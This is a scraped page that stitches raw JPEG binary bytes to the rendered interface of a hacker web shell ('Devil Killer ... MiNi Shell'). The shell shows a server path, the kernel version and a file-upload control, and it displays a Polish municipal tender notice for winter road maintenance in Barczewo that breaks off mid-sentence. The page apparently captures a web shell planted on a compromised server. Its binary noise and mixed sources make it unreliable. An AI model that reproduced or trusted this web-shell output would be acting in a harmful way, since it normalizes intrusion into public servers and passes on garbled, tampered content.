JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221018/0039749801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zimowe utrzymanie publicznych dróg gminnych i gminnych ciągów komunikacyjnych na terenie gminy Barczewo w latach 2022-2023” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BARCZEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743574</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Barczewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@barczewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://barczewo.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zimowe utrzymanie publicznych dróg gminnych i gminnych ciągów komunikacyjnych na terenie gminy Barczewo w latach 2022-2023” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6462931b-4ecc-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00397498</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023491/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Zimowe utrzymanie publicznych dróg gminnych i gminnych ciągów komunikacyjnych na terenie Gminy Barczewo w latach 2022-2023.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/barczewo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/barczewo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ze względu na ograniczoną liczbę<br/>znaków w formularzu ogłoszenia o zamówieniu informuję, że informacje o środkach komunikacji elektronicznej, przy użyciu których<br/>Zamawiający będzie komunikował się z Wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej oraz informacje dotyczące wymogu użycia podpisu<br/>elektronicznego zostały szczegółowo określone w rozdziale XII i XV SWZ dostępnej pod adresem<br/>https://platformazakupowa.pl/pn/barczewo</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Urząd Miejski w Barczewie, Plac Ratuszowy 1, 11-010 Barczewo, adres e-mail<br/>umb@barczewo.pl, tel. 895148303, kontakt z osobą pełniącą funkcję Inspektora Ochrony Danych<br/>za pomocą poczty elektronicznej pod adresem: iod@barczewo.pl<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego pn.: Zimowe utrzymanie publicznych dróg gminnych i gminnych ciągów<br/>komunikacyjnych na terenie gminy Barczewo w latach 2022-2023 BI.271.36.2022 prowadzonym w trybie podstawowym.<br/>3. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy Pzp.<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy, a następnie przez okres zgodny z jednolitym rzeczowym wykazem akt stanowiącym załącznik nr 2<br/>do rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych lub w przypadku zadania<br/>realizowanego przy udziale środków finansowych pochodzących z UE przez okres zgodny z umową o dofinansowanie projektu.<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>6. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7. posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/>przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą Pzp. oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.47.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie:<br/>1) odśnieżania publicznych dróg gminnych i gminnych ciągów komunikacyjnych własnym, bądź<br/>najmowanym pojazdem samojezdnym,<br/>2) usuwanie śliskości – materiałem wykonawcy.<br/>2. Poprzez zimowe utrzymanie dróg gminnych i gminnych ciągów komunikacyjnych na terenie<br/>gminy Barczewo rozumie się wykonywanie prac związanych<br/>z odśnieżaniem oraz likwidacją gołoledzi i śliskości zimowej na drogach gminnych i gminnych<br/>ciągach komunikacyjnych wraz z chodnikami będącymi własnością gminy (wymienionych oraz<br/>podzielonych na sektory 1, 2, 3, 4, 5, 6 i 8) wskazanych przez przedstawiciela Zamawiającego.<br/>Zimowe utrzymanie dróg obejmuje prace mające na celu ograniczenie zakłóceń ruchu<br/>drogowego wywołanych takimi czynnikami atmosferycznymi jak opady śniegu, zamiecie<br/>śnieżne, czy śliskość zimowa. Odśnieżanie polega na zgarnianiu z całej szerokości jezdni i<br/>poboczy (o ile jest to jest możliwe) śniegu luźnego, śniegu zajeżdżonego, błota pośniegowego,<br/>zasp, języków śniegowych w sposób umożliwiający bezpieczne korzystanie z dróg i ulic. Przy<br/>odśnieżaniu należy zwrócić uwagę, aby usuwany śnieg nie był przemieszczany na inne drogi<br/>zwłaszcza będące w innym zarządzie oraz nie były zasypywane wjazdy na sąsiednie<br/>nieruchomości.<br/>3. Usuwanie śliskości i gołoledzi polega na posypywaniu dróg, ulic oraz chodników piaskiem,<br/>bądź mieszanką piaskowo-solną, na odcinkach o pochyleniu &gt;5% lub<br/>w miejscach występowania niebezpiecznych łuków pionowych i poziomych, jak również<br/>skrzyżowania dróg, ulic, torów kolejowych, a także miejsca w obrębie przystanków<br/>autobusowych i przejść dla pieszych. 4. Wykonanie przedmiotu zamówienia nastąpi przy użyciu pojazdów samojezdnych będących<br/>własnością wykonawcy lub przez niego wynajmowanych oraz<br/>przy użyciu materiału wykonawcy niezbędnego do odśnieżania oraz usuwania śliskości i<br/>gołoledzi przez osoby posiadające odpowiednie kwalifikacje. Pojazdy samojezdne dopuszczone<br/>do odśnieżania powinny być przygotowane w takim stopniu, aby mogły być użyte w ciągu …….<br/>godzin (ilość godzin zostanie ustalona w ofercie), od przyjęcia zgłoszenia od przedstawiciela<br/>Zamawiającego. Pojazdy będące w akcji muszą być wyposażone, w sygnał ostrzegawczy<br/>błyskowy barwy żółtej. W przypadku awarii ww. pojazdu, wykonawca zobowiązany jest<br/>podstawić do pracy (w ciągu jednej godziny) pojazd zastępczy sprawny technicznie<br/>i spełniający wymagania Zamawiającego. Przez pojazdy samojezdne, które Zamawiający<br/>dopuszcza do odśnieżania i usuwania śliskości oraz gołoledzi należy rozumieć: samochody<br/>ciężarowe z pługiem odśnieżnym, ciągniki rolnicze<br/>z pługiem odśnieżnym, spycharki oraz spycharko-ładowarki, piaskarki z pługiem, inne pojazdyprzystosowane do odśnieżania i usuwania śliskości, gołoledzi oraz usuwania śniegu, lodu, błota pośniegowego itp.<br/>dostosowane do infrastruktury drogowej (tj. sprzęt lekki – do odśnieżania<br/>chodników w sektorach 1, 2, 5, 6); sprzęt ciężki – do odśnieżania pozostałych terenów).<br/>5. Wykonawca zobowiązuje się do przyjęcia zgłoszenia od Zamawiającego<br/>we wszystkie dni tygodnia, święta i niezależnie od panujących warunków atmosferycznych.<br/>Wykonawca zobowiązany jest do podjęcia czynności odśnieżania i usuwania śliskości ciągu<br/>………….godzin (ilość godzin zostanie ustalona podczas negocjacji), od przyjęcia zgłoszenia, a<br/>przejezdność dróg ma być uzyskana zgodnie<br/>z wymaganiami określonymi w standardzie utrzymania dróg gminnych ujętych<br/>w Zarządzeniu Nr 0050.221.2019 Burmistrza Barczewa z dnia 14 listopada 2019 roku w sprawie<br/>ustalenia standardów zimowego utrzymania dróg na terenie Miasta i Gminy Barczewo i<br/>zakwalifikowania ich do poszczególnych standardów, stanowiący załącznik do zaproszenia do<br/>negocjacji. Wykonawca ma obowiązek prowadzenia ewidencji realizowanych usług. Wykonawca<br/>jest w stosunku<br/>do zamawiającego, w dyspozycji 24 – godzinnej w zakresie przyjęcia zgłoszenia<br/>i wykonania usługi. Wykonawca udostępnia dyżurny – całodobowy numer telefonu i przyjmuje<br/>zgłoszenia wyłącznie od uprawnionego przedstawiciela Zamawiającego. Odbiór wykonanych<br/>prac nastąpi przez osobę upoważnioną<br/>ze strony Zamawiającego.<br/>6. Za wykonanie przedmiotu zamówienia Zamawiający zapłaci wykonawcy wynagrodzenie<br/>według stawki - ceny jednostkowej za jedną godzinę zimowego utrzymania dróg, przy czym do<br/>miesięcznego fakturowania liczy się wyłącznie<br/>te usługi odśnieżania, które przedstawiciel Zamawiającego zgłosił wykonawcy<br/>do wykonania. Do faktury wykonawca musi załączyć potwierdzone przez przedstawiciela<br/>Zamawiającego (uprawnionego pracownika Wydz. Budownictwa i Inwestycji UM w Barczewie lub właściwego miejscowo sołtysa lub radnego) miesięczne zestawienie wykonanych usług<br/>wskazujące na ilość i jakość wykonanego zakresu robót. Zamawiający dopuszcza możliwość<br/>w sytuacjach awaryjnych, kierowania wykonawcy do pracy w innym sektorze<br/>lub na innych drogach. Zamawiający dopuszcza do realizacji niniejszej usługi użycie wyłącznie<br/>zarejestrowanych pojazdów posiadających ważne badania techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje w okresie 3 lat od dnia udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy usług,<br/>zamówienia polegającego na powtórzeniu usług w zakresie zimowego utrzymania publicznych dróg gminnych i gminnych ciągów<br/>komunikacyjnych na<br/>terenie gminy Barczewo w latach 2022 – 2023, w ilości do 50% godzin podanych w poszczególnych częściach i do 50% wartości<br/>szacunkowej każdej części</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Każda oferta niepodlegająca odrzuceniu zostanie oceniona wg wyżej<br/>wymienionych zasad. Ocenę oferty stanowi suma punktów określona<br/>dla poszczególnych kryteriów wg wzoru:<br/>Of = Ck+B gdzie:<br/>Of – ilość punktów uzyskana przez badaną ofertę;<br/>Ck – ilość punków uzyskana przez badana ofertę w kryterium ,,Cena brutto oferty’’;<br/>B – ilość punków uzyskana przez badana ofertę w kryterium ,,Czasu podjęcia czynności odśnieżania<br/>od przyjęcia zgłoszenia (w godz.)’’.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą<br/>ofertę.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie Pzp, oraz w swz i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą<br/>ofertę.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli Zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród<br/>niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podjęcia czynności odśnieżania od przyjęcia zgłoszenia (w godz.)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie:<br/>1) odśnieżania publicznych dróg gminnych i gminnych ciągów komunikacyjnych własnym, bądź<br/>najmowanym pojazdem samojezdnym,<br/>2) usuwanie śliskości – materiałem wykonawcy.<br/>2. Poprzez zimowe utrzymanie dróg gminnych i gminnych ciągów komunikacyjnych na terenie<br/>gminy Barczewo rozumie się wykonywanie prac związanych<br/>z odśnieżaniem oraz likwidacją gołoledzi i śliskości zimowej na drogach gminnych i gminnych<br/>ciągach komunikacyjnych wraz z chodnikami będącymi własnością gminy (wymienionych oraz<br/>podzielonych na sektory 1, 2, 3, 4, 5, 6 i 8) wskazanych przez przedstawiciela Zamawiającego.<br/>Zimowe utrzymanie dróg obejmuje prace mające na celu ograniczenie zakłóceń ruchu<br/>drogowego wywołanych takimi czynnikami atmosferycznymi jak opady śniegu, zamiecie<br/>śnieżne, czy śliskość zimowa. Odśnieżanie polega na zgarnianiu z całej szerokości jezdni i<br/>poboczy (o ile jest to jest możliwe) śniegu luźnego, śniegu zajeżdżonego, błota pośniegowego,<br/>zasp, języków śniegowych w sposób umożliwiający bezpieczne korzystanie z dróg i ulic. Przy<br/>odśnieżaniu należy zwrócić uwagę, aby usuwany śnieg nie był przemieszczany na inne drogi<br/>zwłaszcza będące w innym zarządzie oraz nie były zasypywane wjazdy na sąsiednie<br/>nieruchomości.<br/>3. Usuwanie śliskości i gołoledzi polega na posypywaniu dróg, ulic oraz chodników piaskiem,<br/>bądź mieszanką piaskowo-solną, na odcinkach o pochyleniu &gt;5% lub<br/>w miejscach występowania niebezpiecznych łuków pionowych i poziomych, jak również<br/>skrzyżowania dróg, ulic, torów kolejowych, a także miejsca w obrębie przystanków<br/>autobusowych i przejść dla pieszych.<br/>4. Wykonanie przedmiotu zamówienia nastąpi przy użyciu pojazdów samojezdnych będących<br/>własnością wykonawcy lub przez niego wynajmowanych oraz<br/>przy użyciu materiału wykonawcy niezbędnego do odśnieżania oraz usuwania śliskości i<br/>gołoledzi przez osoby posiadające odpowiednie kwalifikacje. Pojazdy samojezdne dopuszczone<br/>do odśnieżania powinny być przygotowane w takim stopniu, aby mogły być użyte w ciągu …….<br/>godzin (ilość godzin zostanie ustalona w ofercie), od przyjęcia zgłoszenia od przedstawiciela<br/>Zamawiającego. Pojazdy będące w akcji muszą być wyposażone, w sygnał ostrzegawczy<br/>błyskowy barwy żółtej. W przypadku awarii ww. pojazdu, wykonawca zobowiązany jest<br/>podstawić do pracy (w ciągu jednej godziny) pojazd zastępczy sprawny technicznie<br/>i spełniający wymagania Zamawiającego. Przez pojazdy samojezdne, które Zamawiający<br/>dopuszcza do odśnieżania i usuwania śliskości oraz gołoledzi należy rozumieć: samochody<br/>ciężarowe z pługiem odśnieżnym, ciągniki rolnicze<br/>z pługiem odśnieżnym, spycharki oraz spycharko-ładowarki, piaskarki z pługiem, inne pojazdy przystosowane do odśnieżania i usuwania śliskości, gołoledzi oraz usuwania śniegu, lodu, błota pośniegowego itp.<br/>dostosowane do 